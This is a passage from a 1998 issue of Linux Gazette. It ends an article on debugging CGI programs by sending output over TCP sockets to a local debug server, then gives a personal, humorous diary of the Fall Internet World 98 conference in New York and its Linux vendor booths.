Another problem in debugging CGI's is viewing the output of a CGI that fails to run correctly. If you are using Apache 1.2 or later, this can be addressed by configuring the web server to log error messages to an error log file. This approach works for some classes of problems, but does not provide the granularity I wanted.

One could write debugging/status information to log files and use tail -f logfile to view the file. This works, but can produce deadlock conditions if multiple copies of your CGI are running and they attempt to use the same shared resource (the log file) without file locking. Developers must provide file-locking code and handle possible deadlock conditions, including cases where a CGI crashes before it releases its file lock [1]. In addition, all writes must be atomic to ensure correct output.

Ideally, one would like to debug the CGI in its natural surroundings, i.e., from within the environment created by the web server, without any extra setup work.

MY SOCKET-BASED SOLUTION

An alternative technique is to use network sockets to write debugging information, using printf-like statements, to a debug server application running on the developer's local machine, or on any machine on the network. Using this technique, CGI's can be debugged and monitored quickly and easily while running within the server environment. The class SocketDB provides the required behavior to debug CGI's over TCP sockets. The class supplies methods to connect to the server and write strings over a TCP socket.
class SocketDB
{
private:
  int mSD;                 // socket descriptor
  ErrorTypes mErrorType;   // last error code (see Socket.C)
  int mConnected;          // non-zero once a connection is established

public:
  SocketDB();
  SocketDB(char *name, int port);
  ~SocketDB();

  int Connected() { return mConnected; }
  int ErrorType() { return mErrorType; }
  int Connect(char *name, int port);

  int Print(char *format,...);
  int Println(char *format,...);
};
To connect to the server, use the SocketDB constructor, passing the server name and port, or use the Connect method. Both will attempt to connect to the server on the specified port. Use the Connected method to determine whether the connection was successful, or use the return value of Connect. The Connect method returns 1 if connected and 0 otherwise. If a connect error occurs, use the ErrorType method to get error information. The file Socket.C enumerates the error types.

THE CLIENT

The program DebugClient (see DebugClient.C) shows how to use the class. For simplicity, I designed this program to run from the command-line, rather than as a CGI program run by the web server. I chose this approach so users could quickly run the program and see how the socket debug class works. Integrating the class into a CGI is very straightforward.

The program attempts to connect to the debug server program specified by the command-line arguments host and port (see source code). If it fails to connect, it prints a message and the error code, and exits. If it connects, it prints the test string, writes the same string over a TCP socket to the debug server, and reports the result of the debug server write.

A DEBUG SERVER

The program DebugServer (see DebugServer.C) implements an example debug server [2]. This program is a simple echo server that creates a socket, binds to it and accepts connections from clients. Once it gets a connection it forks off and handles the connection. In this case it just reads a string and echoes it.

USING THE PROGRAMS

To use the client program and the debug server, cd to the directory containing the example programs and type DebugServer [port] where port is the port you want the server to listen on. For example, to run the program on port 4000, type DebugServer 4000.

In another shell, cd to the directory containing the example programs and type DebugClient [host] [port], where host is the host name of the machine the server is running on (get this by typing hostname at the command prompt) and port is the port where the server is listening (4000, for example).

You should see a text string written to the server and to the shell.
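You can also sanity-check the server without the client: since the example server simply echoes whatever it reads, any line typed into a raw TCP connection should come right back (using port 4000 as above):

bash$ telnet localhost 4000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
hello, debug server
hello, debug server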

CONCLUSIONS

Using network sockets to write debugging and state information to a server application is a flexible and effective technique for monitoring and debugging CGI programs. Using this method, developers can quickly debug CGI's while they run within the server environment.

RESOURCES

[1]. W. R. Stevens, 1990, UNIX Network Programming. New Jersey: Prentice-Hall, Inc., pp. 88-101.
[2]. W. R. Stevens, 1998, UNIX Network Programming, Volume 1: Networking APIs: Sockets and XTI. New Jersey: Prentice-Hall, Inc.

Code: http://groucho.eecs.umich.edu/~omalley/software/socket_debug-1.0.tar.gz


Copyright © 1998, Kevin O'Malley
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"



Fall Internet World 98
A View From the Show Floor
By




I just experienced my first big-league Internet show. And was it a doozy.... The show was titled 'Fall Internet World 98' and it took place in New York City's Javits convention center. There was a 4-day 'vertical' track on TCP/IP, which was one of the motivations for going to the show. The other was to meet the commercial Linux people in person. So what follows is a 'diary' of what I can remember of the show.

Day 1) I live on Long Island, NY, and I have to take a 1.2-hour train ride in order to reach the Javits convention center where the show is being held. My day starts by getting up at 5:45 am, taking a quick shower, and trying to get to the train station, a good 30 minutes from home, by 6:30 am. This first day, I got a call from the experiment where I work, telling me that data could not be collected. I'm the DAQ guy. I figured I would drive by work, fix the DAQ problem, and continue on to the train station. The problem was minor, but I missed the 6:30 train I wanted to take and ended up on a later train. What was the rush? According to the Fall Internet World 1998 web page, the keynote speakers were to start on Monday at 9am and I still had to register. I wanted to get into Javits, register, and get a good seat for the keynote. I was rushing to get to NYC. The train ride in was uneventful. The weather was fantastic: 70-odd degrees that day, clear blue fall skies. Getting into Penn Station and out onto the streets of NYC on a bright, clean, crisp fall day is hard to explain. You have to experience it yourself. Javits is between 34th and 36th or 37th Street and 11th Avenue; Penn Station is at about 8th and 33rd. So I take off west, down 34th, searching for Javits. I'd seen it from the outside a long time ago and wasn't really sure where to find it. Found it; hard to miss. And yes, there was some kind of computer show going on there. The front of the convention center had these large banners draped with some message from Hewlett Packard for all to see. There were some other banners draped in front of the building which I cannot recall now.

In I go, expecting to see thousands, and the place looks rather empty. I peer into the show floor to find boxes and crates unopened all over the place. "Gee," I think to myself, "they have a lot of work to do in order to get set up for today." I go over and register; there is no one in line. And again I think to myself, "This is weird, the place is dead." I was worried that I would miss the keynote address of John Gage, some science guru working for Sun. Well, it turns out that the show was really to get going on Wednesday. Ha, this explains all: I was rushing around for no purpose at all. The good thing was that the sessions I wanted to attend did start today, so waking up at 5:45 am was not a complete waste of my time. Now all I had to do was blow off one hour waiting for my session to start. In the meantime, I went to get a cup of coffee from one of the show vendors. I spent 5 bucks on an oversized coffee and muffin. The coffee these guys sold me was so charged up that I ended up running to the bathroom to pee at every break in my session.

10am finally rolled around. I went to my session, titled 'The Infrastructure of IP' or something like that, and spent the rest of the day listening to a rather polished man (polished in appearance) telling me about IP. I knew about 70% of what he was telling me and was glad to learn the other 30%, which I'd heard of but never knew the details of. (What exactly is a class A, B, C, D, or E network, and the whys and wherefores of DHCP, a rather new protocol to replace bootp (new in that I'd just heard of it when RedHat 5.1 was released).) The other stuff he covered I can't remember now. What I remember most of this session was that this guy reminded me of a tele-evangelist. First off, the guy wore a very nice suit. You can't blame him; it's his job, and working in the private sector, you have to look good. He worked for a training company, and this explained why (at least I assumed why) he presented his material as he did. His style was as follows. His presentation tool was PowerPoint, jazzed up with animations. A slide could not just pop up. The letters had to roll in, highlight streaks had to streak in, and the bullet items came rolling in one after another, with a nice time delay of several seconds between items. Very slick. He would present his material in a way which was supposed to make you feel good about what you were listening to. He kept asking questions, not for the sake of the question, but to get the audience involved. He would walk up and down the aisle talking about IP headers and the OSI networking model, always interjecting, "Do you feel comfortable with that? Is it all coming together now?", all the while giving me this weird feeling that I needed to yell "Amen, the TCP/IP God is great and forgiving".

This went on for the rest of the day: sitting inside this small room listening to the wonders of IP. At one point, I decided I needed to get out and look around a bit to see what the rest of the conference attendees were engaged in. I poked my head into one room, about 4 times the size, full of people talking Web marketing strategies. I mean it was full. This pointed out to me one fact about the Internet: very few know how it really works, and the rest are trying to cash in using browser technology.

Day 2) Since my session didn't start until 10am, I didn't rush to catch the train. Instead I took my wife to work, and then had to run and catch the last train which got into NY at 10am, meaning I would miss the first 15 minutes of my session. That's OK. After sitting through about 6 hours of tele-evangelism, I figured I could miss the first 15 minutes of "Integrating Unix and NT", or was it "Making Unix talk to NT", or something to that effect. The idea being that you were to learn how to set up a heterogeneous Unix/NT computing environment. I got the same guy from yesterday giving this session. Great guy, but I couldn't take it anymore. He ended up getting hung up on setting up a DHCP server on his laptop running NT. Hey, I can fill in a widget form thing with IP numbers too... I figured I'd had enough and that this time I wouldn't learn much. I wanted to see what else was 'out there'. So I wandered over to the ISP session. There was an interesting talk on setting up VPN's. That was new to me. Virtual Private Network. I still don't understand why it's such a good thing. To me, it has a bit of a snake-oil man's thing to it. Look, we can set up this 'tunnel' between sites on your enterprise. It's secure, it uses the Internet, it drives costs down. And I'm thinking to myself, "Well, I've got secure shell on my PC at home; if I've got secure shell on my PC at work and I ssh between the two, I must have a VPN!" I'm pushing the forefront of Internet technology without even knowing it. I guess VPN's are for those who don't have access to ssh. Hmmm... I paid $0 for ssh; I wonder what it costs to set up a VPN? Do the ISP's give it away? I wandered from the ISP session to the Telephony session. I learned about VPN's in that session too. Here, there was a slick woman from 3Com who had even slicker .ppt files to dazzle you with. These .ppt files were in full animation. Cartoons would pop up and disappear, text would flow, arrows and pointers swooshed. I hope I don't get a .ppt deficiency complex next time I present my all-too-static transparencies. (Transparencies.... (Yes, I do code in Fortran more often than I would like to admit. But I have written some C++ code, as crude as it was...))

Lunch came next. The day before, I had gotten a hotdog from a vendor across 11th Avenue for $1.50. With a soda it cost me less than $3.00. Today, I got into the cafeteria line, pulled a rather bland ham-and-cheese-hero-looking thing from a shelf, a bag of chips, and a soda. $10.00!!!! I grunted as I pulled a $10 bill from my wallet, but the cashier didn't seem to care. (It's not her fault I'm stupid.) I wandered around the tables and found one where only one guy was sitting at a table which fit 4. I sat down and munched away. After some time, I got to talking to the guy. He was a chap from Israel with a T1 connection out of his house and a 45Mbit connection coming in! Talk about an asymmetric plug into the Internet. My god. This guy was into testing some on-demand DVD video app into his house. Well, I'll be waiting for my 45Mbit connection coming from Bell Atlantic soon. Yeah, real soon. It took 9 months to get ISDN into my house from Bell Atlantic, when they swore up and down it would be 3 weeks tops. Using Adler's law of monopolistic trends in hi-tech, I give Bell Atlantic 20 years before I see 45Mbits into my house, even though this guy has it *now*. (I'll have more sarcastic comments on this topic later...) OK, that was lunch. I decided to blow off the rest of the Unix/NT session. At this point I can't remember very well what I did. It's all getting rather blurry. I do remember the last session I went to on day 2 of the conference. It was titled "The Governance of the Internet" and was a panel of a bunch of rich guys discussing how the government should not intervene in regulating what is deployed on the Internet and how it's deployed. The unfortunate part was that too much of the discussion centered on 'adult material', with eyes rolling up at each mention of that dirty subject.

Day 3) Finally, the first day of the real conference. I got up at 5:45 am and rushed off to catch the train. The 7:05 express got me in at about 8:30, which would be enough time to walk over to Javits and catch a good seat for the morning keynote. The delivery of this keynote really set the stage for the next two days of this conference. The keynote took place in the 'special events hall', a large auditorium with a low ceiling which could seat about 1000 people, I estimated. The stage was set up with 4 projection-size TV screens. (20 feet high by 30 feet long; I don't know if I have the aspect ratio correct there, but they were big.) Above the speaker's podium was another regular TV which must have been at least 48'' in size. The props which fit between these screens were black with thin fluorescent geometric designs. (Predominantly orange fluorescent tones.) As I walked in, some rather hyped rock and roll music was playing. Fast beat music. I'm glad I didn't have a cup of the coffee they served there in the Javits food stand, because between the caffeine overdose they serve and the rock and roll, I would have shot out of my chair. So there I wait, rock and roll in the background, cool fluorescent stage props in front, and tons of MecklerMedia ads on the TV screens (all 5 monster screens of them). The music let up, the screens went blank, and the show was about to begin. The first 2 or 3 minutes were dedicated to a rather glitzy ad for Sun Microsystems. More rock and roll; the 5 screens lit up with MTV-style imagery dedicated to promoting Sun. After that, some rich guy (member of the overclass) comes out and introduces himself. (Head of MecklerMedia, the sponsors of the show.) He eventually gets around to introducing the keynote speaker, John Gage. John, from what I can tell, has a science background. I would assume he has a Ph.D. in physics or something, since he is the science liaison for Sun Microsystems. Being that I'm a scientist, I figured this would be a good chance to see what us science guys are doing to help Internet technology. He gave a very good talk. In the end, he ended up promoting Sun's alternative to CORBA, called Jini. And no, it's not in the public domain. John had some guy who seems to be involved in the development of Jini come out and tell us what Jini is and how it would affect the world. The appliance world, that is. Jini was going to be, dare I call it, the OS which runs in your camcorder, cell phone, PC, coffee pot, refrigerator, the steering and braking system in your car, the landing gear in the next plane you fly, the stop light at your closest busiest intersection, the elevator in the World Trade Center... Wait, is this a Really Stupid Idea!!!! This is nuts!!!! I don't want my car's braking system to be on the Internet! No way! It's going to be break-in city. All the hackers (I don't mean to give all hackers a bad name) who dedicate themselves to testing systems' IP vulnerabilities are going to have a field day. I am sure there will be a web page with the IPv8 address of my braking system and the buffer overflow code which you can download into this Jini thing in my braking system, which will cause the braking system to invert: instead of pushing the pedal in my car to brake, I'll have to push the brake pedal to release the emergency brakes. Good grief, I thought the year 2K freaks were crazy about the end of the world. Jini will end it all. After this Jini guy finished talking about the object'ivity of this code (you should have heard him rant: "This camcorder is an object. It's got methods! The record method. The 'upload your data' method", all while staring intently at the camcorder, as if he were looking into and beyond it into every appliance on the Internet, including the braking system of my car), John finished off his talk in brilliant fashion: he pulled up the 'coolest taxi in Colorado' web page for us to see. Some guy, I can't remember where in Colorado, has wired up his cab to the Internet. The interior of his cab is totally wacked out. It's got a full complement of musical instruments (drums, keyboard, amplifiers, etc.) as well as a digital camera which he uses to take pictures that he uploads to his web site. Here, check it out.

After that bit of excitement I decided to pace myself and go to some sessions before hitting the trade show floor. The problem is that I can't remember what sessions I went to. But I do know that I only went to one of them, because soon after it I was on my way to check out the RedHat booth. My main calling at this show was to meet the RedHat team. I wouldn't call myself a Linux fanatic, maybe just an enthusiast, and I've gone through about 50 installations of RedHat on one machine or another since I started using it in the spring of 1996. I've been following the growth of RedHat on a somewhat daily basis since then, and I've seen that they tour the world, meeting LUG groups and whatnot. So, needless to say, I did have a peak of curiosity about meeting someone from RedHat in flesh and blood. My search for the RedHat booth was frustrated by the poor documentation provided by the show. I went to the first floor, looking for booth 3368 or something like that, and found this empty booth space in the far back reaches of the first-floor show area. I then found out that they were on the second floor. This was good, since this was the main show area. Then I went to the second floor and wandered around looking for them. Again, the booth numbering is not quite random, but close. I'm sure mathematicians have a name for it. Local Random Space, or local non-transforming functionals, who knows. I finally stumbled into them. There it was, the RedHat booth. I was expecting it to be mobbed by people, but it was not. It was rather empty. They had one or 2 PCs running RedHat Linux and the secure version of Apache. I went up and introduced myself to Melissa, the PR woman for RedHat, although she didn't want to refer to herself as a PR person. I guess there is some stigma attached to the PR departments of high-tech companies which eludes me. Maybe it's because I don't watch enough TV to see all the MS commercials. In any case, I told Melissa that I expected RedHat to get really big. I was curious to find out what was going on with the company. She told me that it was crazy right now. My guess is that the RedHat team is hacking late into the night. With the recent investment by Netscape, Intel, and two venture capital firms, they are clearly booming. (I recently saw the announcement of two new positions at RedHat on their announcement mailing list.) As I stood around the booth, it was clear to me that people were continuously coming to the RedHat booth to ask questions. I was trying to stay out of their way, or to answer some questions if people couldn't get to the RedHatters. After telling Melissa that I have a RedHat mirror site, she got excited and gave me a mouse pad and a poster. I hung around a bit more and found out that all the other Linux vendors were in the Oracle Partners pavilion. So I headed over there.

There I found the Pacific HiTech guy, the Caldera guy, the SuSE guys, and the VA guy. I spent some time with each. At that time, the VA guy was in a crisis situation. His PC had arrived broken. It was shaken up during shipping. Eavesdropping in on the situation, it sounded like the disk drive was not properly screwed into its bay, and when the VA guy opened up the box, he found the system disk sitting on the bottom of the enclosure. After putting the disk back where it belonged, it wouldn't boot. At that time, there was some guy from RedHat trying to figure out how to get it back up and running. It was tense. The RedHat guy had a bead of sweat coming down the side of his forehead while he frantically typed commands at the console trying to diagnose the problem. I've been in similar situations, but not as bad as having my system dead on the show floor of a major Internet conference. Instead of standing around looking over his shoulder adding to his pressure, I wished the guy good luck and took off for lunch. (I stopped by some time later, and the machine was running fine.)

Lunch. Two hotdogs and a soda. All for under $5. Much better. Thank you, street vendor. (Hmm... I see parallels here between open and closed source development, and lunch from the street vendor versus the conference cafeteria.)

After lunch came the Oracle keynote, given by the CEO of Oracle, Larry Ellison. The only time I'd seen him before was in a very good documentary by this Cringely guy, titled something like "The Revenge of the Nerds", which historically tracked the rise of the Silicon Valley power houses along with MS. The pre-keynote show, or ad, was really intense. All 5 TV displays were in full swing, throwing up graphics and images of Oracle and the Internet. The music was very loud and fast. The adrenaline rush was mounting. After about 5 minutes of this extremely intense pitch, the noise gave way to silence. Then someone from the audience shouted "LOUDER!". Everyone laughed. And out came the CEO of Oracle. I don't know if he caught that, but I would have been rather embarrassed. So off he goes, ranting and raving about the future of computing. He ragged as much as possible on Microsoft. (There was an article in the NYTimes which talked about NT servers in every Burger King or McDonald's, and he thought that was a bad idea.) He then went on to describe the power of the Internet and how his product was going to take advantage of it, etc., etc... It's hard to take so much promotion of someone's software. The one thing that irked me was that he was confusing the Internet with the browser. He kept saying things like, "You can access our database on the Internet", and he popped up Netscape and ran through some demo. I have a feeling that either he figures the regular Joe Schmo user considers the browser to be the Internet, or he is a regular Joe Schmo user who doesn't know the subtleties of what he was ranting and raving about. In any case, while he was stepping through his demo, which was running on an iMac, the app froze and there was a frantic rebooting of the machine. The Oracle guy was able to talk his way through the rebooting of the poor iMac. This is life at the bleeding edge. Even Larry Ellison has to bleed a little.

After the keynote, I turned my attention to a session titled "Getting the most out of the Mozilla source code." Cool, open source, finally something about the real future. The guy who talked impressed me. He was an African guy who waxed well about web page development. I was glad to see that the field of Internet technology is not completely dominated by males of Protestant/European descent. The session that followed was by some guys from real.com (I think the name has changed) who talked about audio and video compression, the topic of the session being multimedia in your browser. The technical stuff they covered was good. I can now claim to be an expert in audio and video compression. I know the jargon words: compress, equalize, encode, decode, key frame, mpeg, and so on and so forth. With that, I can bullshit my way through any multimedia discussion.

I lost patience with the conference sessions and decided to go back to the show floor. Instead of rushing off to the RedHat booth in mere panic, I scouted out the various setups put up by all these forefront companies. The companies who rented real estate from Javits were a who's who of my life blood: HP, Sun, SGI, IBM, Motorola, Cisco, Microsoft, Bell Atlantic, Computer Associates, O'Reilly, Oracle, Sybase, and on and on. The big players had big booths, and just as in the real world, the real estate proverb of "Location, Location, Location" applies equally well here. All the companies with big bucks were positioned right in front of the several entrances to the main show floor. IBM bought the best spot; they were just behind the main entrance. Microsoft had the second best spot, which was just to the right of IBM. It's hard to describe the impression on some guy who has never seen this kind of presentation before. It's BIG, it's LOUD, it's FLASHY, it's CATCHY, it's MTV, it's exhausting. These Fortune 500 booths all had big audio/visual displays advertising their merchandise. All screens were BIG. Those cool Sony TVs, where you put 9 or 16 of them together in an NxM array and together they make up one big TV screen, were all over the place. IBM must have had half a dozen of these arrays set up. The detailed setup of all these booths has been lost from memory. Some exceptions linger. First is Motorola's Digital Diner. Forget the elaborate array of video technology (gadgets); Motorola, I think, outdid everyone with their Digital Diner. As I strolled around the floor trying to keep my mind from exploding from information overload, I saw this diner-looking structure with a bunch of people standing around, rather captivated by what was going on inside. I got a closer look, and it took a bit of focusing (my brain was fighting these peak levels of information infusion), and I realized that inside this diner was a restaurant mockup with a full Broadway cast singing and dancing to the handful of show attendees who caught a seat at one of the booths inside this Digital Diner. They were singing and dancing to the tune of IP Telephony, no less. The cast was a hoot. They had a cop, some sales guy, and 3 waitresses. And sing and dance they did. From outside the booth, you could not hear the music or what they were saying, but the visual of waitresses dancing around with coffee pot and mug in hand, with those head-held microphones, was just too cool. VIVA New York City! (My guess is that the cast is from Pasadena and they tour the country going from Internet show to ISPCon singing and dancing the IP Telephony tune, but NYC is the center of the universe for Broadway shows, and seeing this kind of production in Javits was special. At least to me....) Not to be outdone, the folks at Computer Associates had their own production going. Their theme was jazz, and the stage was a funky bar/cabaret setting. Here they had a couple with the familiar head-held mics, dancing around singing about CA solutions for your corporate enterprise. They were supported by another couple who had no head mics but just danced around. Again, a type of 50's be-bop, as was going on in the Digital Diner. Very entertaining. Trying to compete with this kind of message delivery, the booths of smaller, lesser-known (at least to me) companies had magic shows and guys on unicycles juggling swords. If you thought Central Park on a sunny summer afternoon was a zoo, then you haven't been to an Internet show lately.

While wandering around, I got the booth number for the NY LUG, named LXNY. Strange acronym for a users group. They were located in the first-floor show area, way in the back. They could not have been further removed from the action. OK, local users group, no money, perfectly understood. I introduced myself to the guys, signed up for their mailing lists, and hung out for a chat with them. The guy in charge seemed to be a reasonable chap. He tells me he is a perl nut, or something to that effect. Cool, definitely an open source kind of guy. There was another guy working on an install of SuSE on his laptop. I peered over his shoulder and saw some of the installation pages as they flashed by while he selected this or that to be installed. Looked nice, a bit more polished than RedHat's install. There was another chap who told me how he partitioned his disk (all wrong according to my rule of partitioning disks: /, swap, and /home, and that's it...). Then there was another guy who sported an old red baseball cap with the RedHat logo on it. It looked rather well worn. He had a scruffy beard, and we talked a bit. He told me that he knows Eric Raymond, the guy who wrote that "The Cathedral and the Bazaar" net-paper, from some Sci-Fi shows. He then goes on to tell me about his political slant. He's a libertarian. He tells me that he and Eric, when not talking about open source, talk about politics and guns. "Guns?" I say. Yes, guns. He then asks me if I believe in the First Amendment. "Yes," I say. "Do you own a gun?", he asks. "No," I reply. "Then SHUT UP!", he snorts. Yup, guns and the First Amendment go hand in hand. He continues to tell me how the ten amendments have been eroded by the 'Government'. It's hard for me to carry on a conversation with this guy, especially when it turns to Y2K and stocking up on provisions for the aftermath.

Day 4) Up and at 'em at 5:45 am. The day turns out to be rather gloomy, with rain forecast. By now, my commuting routine is getting fine-tuned. I got to the train station in time to leisurely buy my round-trip ticket, coffee, and bagel, and still have 1 minute to hang out on the train platform watching all the other commuters who had equally well-tuned commuting skills. Getting to Javits, I go directly to the special events hall to hear the keynote, which will start in about 10 minutes. The ambiance is much more subdued. The usual MecklerMedia ad stuff on the now more mundane 5 screens rolls on unnoticed. (It's amazing, the capacity of the brain to adapt to new levels of sensory filtering.) The speaker was the Chairman/CEO of AT&T, C. Michael Armstrong. What he had to say was rather boring compared to the previous two speakers. He had no gizmo to show off, or web pages to surf to. He basically announced one thing: the intent of AT&T to take over the Internet as we know it. Fair enough. He boasted of the recent $48e9 acquisition of TCI. He waxed about the quality and quantity of future AT&T cable modem services. In all, he came across as the most fine-tuned, image-projecting CEO that I've met. (The only other CEO being Larry Ellison.) Still, I was rather amazed at the skill of this guy at projecting the image of Stability, Strength, Leadership. By the end of his speech, I wanted him to be my grandfather. (Not for the money, mind you.) I recently met NY's senator from Long Island, Al D'Amato. Al is on the opposite end of the spectrum from the CEO of AT&T. When I met Al, the bit which struck me the most was his total arrogance toward the people around him, and at the same time his attempt to try and look caring. He would crack a forced smile when meeting the audience he was going to speak to. When the cameras were on him, that forced smile would pop back into his mouth, and all the while he would have this strange glare in his eye, trying to assess everyone he shook hands with. Needless to say, he blew me off when I shook his hand. (No forced smile for me.) But he did have lots of smiles for my wife, who was also in the hand-shaking line. (And a kiss on her cheek to boot!) In contrast was AT&T's CEO. This man had depth. Being around him gave you a sense of solemnity. He was a family man. He set the stage for his speech by telling a joke involving his granddaughter. After he established himself as a caring family man with his joke, he plunged ahead with talk of how AT&T will be in everyone's home, delivering those Internet services to you via TV. I guess the big difference between Al and this CEO is the amount of money they truly control. Al controls his campaign funds; he really has little control over the US government budget. In contrast, the CEO controls BILLIONS and is paid much more for it than Al gets for voting in the US Senate. So the law of capitalism dictates: you get the Al D'Amatos to run the country and the C. Michael Armstrongs to rule the world!

After the keynote, I decided to take a break from the show floor and the TCP/IP sessions I came to attend, to listen to a discussion on the 'Adult Entertainment Industry' put on by the "Investing in the Internet" session. The session was well attended, and the speakers were an interesting and diverse bunch in themselves. They had what I think was a technology consultant for Penthouse. They had some guy who recently wrote an article for Upside Magazine on the subject; Upside was sponsoring the session. They had a woman who owned her own adult Web site. And there was a guy from a research-type firm who was trying to figure out how much money was being spent on adult web sites. The consulting guy for Penthouse went first. He groaned about the lack of payment for services rendered on these web sites. The researcher gave a short talk on how hard it was to figure out how much money was going into the Internet adult business. His conservative estimate, and believe me, from what he said it is very conservative, is that close to $700,000,000 will be spent this year by guys looking at nude girls doing weird things to themselves and others. This is conservative. (i.e., looking at the volume of charges of the 5 or so most popular adult web sites.) Then the woman, owner of her own adult portal, raved about the wonders of the business. It's recession-proof, it makes MONEY (she broke even in 6 months, but she didn't say how much was invested up front), and there are plenty of models waiting to get into the business. It's safe and virtual. And she thanked Bill Clinton for bringing erotica into the mainstream. She claims to have lots of brunettes posing with cigars. One thing which annoyed me was the video camera which was filming this session. They had the audacity to pan the audience. I had to keep hiding behind the guy between me and the camera to make sure I wouldn't be seen on national TV watching this adult forum and then be left trying to explain to my boss why he should pay $1.4K for my registration fee. I know, it's hypocrisy on my part, but that's just the way I am. So between dodging the camera pans of the audience and listening to the panel mourn the difficulties of IPOing firms engaged in adult content, I got out of the session with this urge to run off and make a billion in porn. Of course I'm not going to do so, but the guy sitting next to me will.

After my short diversion into the underworld of the Internet, I headed back out to the show floor. I had in mind lining up to get into the Digital Diner and perhaps getting one of those Motorola burgers they were serving. (I do a lot of work with Motorola embedded real-time systems, so that Motorola burger would have been a cool fixture on top of my 21'' monitor.) But first I wanted to stop by the SuSE stand to see if I could get a copy of their distribution. I had picked up Caldera's and Pacific HiTech's. Nope, SuSE was still out, and my guess is that they had run out on the first day and the talk of getting more SuSE CDs for distribution today was just hype. There was a lot of action around the Oracle Partners pavilion where the minor Linux distributors were being hosted, so I stuck around. I've heard a lot about KDE, and SuSE packages it with their distribution, so I was checking out what the SuSE guy was demonstrating. After a bit I got engaged with the SuSE guy. He introduced himself as Todd Andersen, the guy who claims credit for getting the term Open Source accepted as the new term to replace free software. What a character. His background is with the Department of Defense. He rattled on for about 30 minutes about the spooks in the CIA, how the NSA is a serious organization, and other goings-on of our defense industry, which I was trying to grapple with. I'm not sure how Todd got into the Linux business coming from the Defense Department; I missed that part of his introduction. Being a fair-minded guy, despite the fact that I'm rather in the RedHat camp, I thought I would offer to mirror their site. I'm currently mirroring RedHat's, and I spent $1K of the government's money in doing so. (You need a large disk.) The disk is not totally full, and since SuSE is making inroads into the Linux mainstream, I thought it appropriate that I also mirror their site. Todd and Bodo (Bodo is the guy with green hair, as described by Dan Shaffer on CNET Radio's "Project Heresy" broadcast of Thursday, Oct 8, who came from Germany to help out his US SuSE brethren) got all excited about this after I told them that the lab I work for has a T3 connection to the Internet. I then proceeded to show Todd the Linux resources web page I've put up for people at Brookhaven National Lab, or around the world as that goes, to get some advice on how to get Linux installed on their machines. Todd was losing interest in my web page due to other show attendees coming around to check out their very nice KDE desktop setup. I bade them firewall and took off to check out how the RedHat booth was doing. Over at RedHat, they were fielding many questions from a handful of people. RedHat was going to get another shipment of CDs, which they were going to start giving out at 2pm. I hung around with Melissa and some other chap who used to work for Los Alamos National Laboratory, who got RIF'ed and is now playing a role in this leading-edge company. He made the right move. He was also the guy who rescued the VA Research machine which arrived in a sorry state at the show. One side note I would like to mention is the guy from Adaptec whom I met. As I was hanging around the RedHat booth, I heard some guy say he was from Adaptec. This caught my attention. To me, Adaptec is the premier provider of SCSI controllers for the PC/PCI market. Most motherboards you get these days have a built-in Adaptec SCSI controller chip giving you an on-board SCSI port, much like the on-board IDE channel all motherboards today provide.
With all the experience I've had installing Linux boxes, I've always run into the Adaptec conundrum. Great hardware, but a bad driver. I've had several instances where spanking new 23 Gig Seagate drives were attempted on a SCSI bus hosted by an Adaptec controller and failed miserably to integrate. My solution: forget the Adaptec built-in Ultra Fast SCSI controller and spend $300 on a BusLogic SCSI controller. A sure win. Great SCSI hardware and an even greater driver to go with it. When I put my first Linux box together, I pondered the SCSI question. Which controller? After poking around in the SCSI HOWTO, I found that Leonard Zubkoff got direct support from Mylex to help write the driver, and the decision to buy the BusLogic card was made. And true to the open source/Internet development environment, it was never more than 24 hours before Leonard would send me a patch to his driver when things went wrong. (At one point I had one differential card and one single-ended card installed in my quad Pentium Pro box and things didn't boot right, and Leonard fixed that problem quickly.) So, back to Adaptec. Not too long ago I read a bit of news on the RedHat web page that Adaptec was going to embrace the Linux community, which meant that it was going to release the full hardware specs to the driver writers. Voila, I could finally count on being able to use all those on-board SCSI controllers which I've had to ignore. But ever since I read this great announcement, I have not been aware of any new Adaptec driver updates, as far as I know. So, I gave this guy from Adaptec the long story I just dumped on you, and he replied with some interesting inside info. First of all, he was not with the SCSI development team. This guy was a sysadmin for Adaptec. But he did tell me that Adaptec has been going through some hard times. With its success in the SCSI market, Adaptec decided to diversify into a whole bunch of other high tech fields, none of which it turned out to be any good at. He told me that the Adaptec stock peaked at $50-something a share and was now down around $5 or so. This has forced Adaptec to go back and concentrate on its core business. Along with that, he told me that Linux is really big inside the company. He said there is a lot of Linux paraphernalia around, and he picked up the RedHat bumper sticker which lay in front of us and pretended to tack it onto an office cubicle wall. "You see a lot of things like this around the company," he said. Just like the rest of us, the Adaptec employees saw the light in Linux, and my guess is that Adaptec's announcement to support the Linux effort came from a movement within the company, from the employees themselves. I found that insider's view of Adaptec rather interesting.

Melissa told me that the RedHat CD handout was going to occur at 2pm. It being around 1:15pm, I decided to go get lunch and then head for the afternoon keynote. It was raining rather hard, so the hotdog stand was out and I had to spend lots of money on a rather simple barbecue sandwich in the overdone Javits cafeteria. From there it was on to the special events center where I waited for about 20 minutes for Jim Barksdale, the Netscape chief, to give his view of the Internet world. I thought I was in for a surprise when the music which preceded the talk was a cool jazz piece. This is good, no need for super hyped up rock sounds beating your adrenaline system into hyperdrive a la Oracle. The problem was, as I found out within a few minutes into Jim's speech, he was a total bore. He lacked everything. No charisma, no attitude, no inner drive, nothing. This guy reminded me of mashed potatoes. Netscape, as far as I'm concerned, is the only browser one should use. Maybe if there was a Linux port of IE, I would try it, but without that, there is nothing else which is graphically based. So, here he is, talking about The Browser, but with no charisma to put the punch into his presentation. I, along with the rest of the audience, was losing my attention for whatever message he had to deliver. The selling point of Netscape was the ability to type a keyword into the URL field and have the browser 'find' the page you were looking for, and the 'what's related' button next to the URL field. He spent some time, too much time, plugging this feature. He then talked wonders about the customizability of the browser, either for one's own personalization or to set up some 'portal' for some company too lazy to hire a good webmaster with the proper Java skills to do the job right. At the end of his keynote, James took off without giving the audience a chance to approach him afterwards for a question or two and/or to exchange business cards. Another flop move. So be it for Jim. Although I could hardly sleep the night I found out that Netscape was going to release the source code via their Mozilla.org site, Jim hooked his wagon to the right company at the right time, nothing more. He talked about running Federal Express before running Netscape. Somehow I can't see the connection between the two companies, except that something went wrong here. Steve Jobs and Bill Gates grew up with the field; Jim Barksdale seems to have dropped in like an uninvited guest. I guess it's much the same as the guy Steve Jobs hired to run Apple who eventually dumped Steve from Apple. We technophiles need to learn some lessons here.

